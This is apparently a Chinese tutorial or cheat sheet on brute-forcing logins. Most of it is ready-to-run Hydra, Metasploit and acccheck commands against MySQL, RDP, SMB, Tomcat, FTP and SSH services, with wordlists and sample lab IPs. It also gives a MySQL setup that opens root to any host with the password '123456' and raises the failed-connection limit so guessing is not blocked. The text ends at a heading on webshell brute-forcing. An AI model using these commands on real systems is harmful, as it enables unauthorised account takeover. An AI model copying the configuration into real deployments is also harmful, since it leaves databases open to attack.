涨姿势!暴力破解方法和工具

字典虽小,够用就行

二、 暴力破解

2.1 mysql数据库破解

  # 爆破数据库账号密码,数据库必须要开启3306远程登录
    2.1.1 Hydra
      hydra IP地址 -l 用户名 -P 字典 服务名 -V
      # hydra 192.168.146.141 -l root -P dist.txt mysql -V
    2.1.2 HexorBase
    2.1.3 metasploit(search查找模块、back返回)
      use auxiliary/scanner/mysql/mysql_login
      # show options
      set host IP地址
      set username 用户
      set PASS_FILE dist.txt
      set port 端口号
      run

2.2 mysql数据库配置(对外)

    2.2.1 3306端口对外开放
      grant all privileges on . to ‘root‘@’%’ identified by ‘123456’ with grant option;
      flush privileges;(root,123456)
    2.2.2 Navicat数据库管理软件
    2.2.3 报错解决方案
      is blocked because of many connec错误解决方案:
        进入Mysql数据库查看max_connect_errors:
        show variables like ‘max_connect_errors’;
        修改max_connect_errors的数量为1000:
        set global max_connect_errors = 1000;
        查看是否修改成功:
        show variables like ‘max_connect_errors’;

2.3 3389远程连接爆破

    2.3.1 DuBrute
      这个只能爆rdp的,smb的用下面(比如win server)
    2.3.2 Hydra
      hydra IP地址 -l 单个账户名 -P 字典路径 服务名 -V
      # hydra 192.168.146.141 -l administrator -P /top1500.txt rdp -V (rdp可以换smb)
    2.3.3 acccheck(smb)
      acccheck -t 192.168.0.106 -U user.txt -P password.txt
      acccheck -t 192.168.0.106 -u tian -P dic.txt
      结果保存在cracked文件中

2.4 Web-Tomcat中间件

    2.4.1 Metasploit
      use auxiliary/scanner/http/tomcat_mgr_login
    2.4.3 对外访问
      Server.xml
      <Engine name=”Catalina” defaultHost=”IP地址”>
      <Host name=”IP地址” appBase=”webapps” npackWARs=”true” autoDeploy=”true”>

2.5 ftp爆破

    2.5.1 Metasploit
      use auxiliary/scanner/ftp/ftp_login
    2.5.2 Hydra
      hydra IP地址 -l 单个账户名 -P 字典路径 服务名 -V
      # hydra 192.168.146.141 -l admin -P /top1500.txt ftp -V

2.6 ssh爆破

    2.6.1 Metasploit
      use auxiliary/scanner/ssh/ssh_login
    2.6.2 Hydra
      hydra IP地址 -l 单个账户名 -P 字典路径 服务名 -V
      #hydra 192.168.146.141 -l root -P /top1500.txt ssh -V

2.7 Webshell爆破

    2.7.1 BurpSuite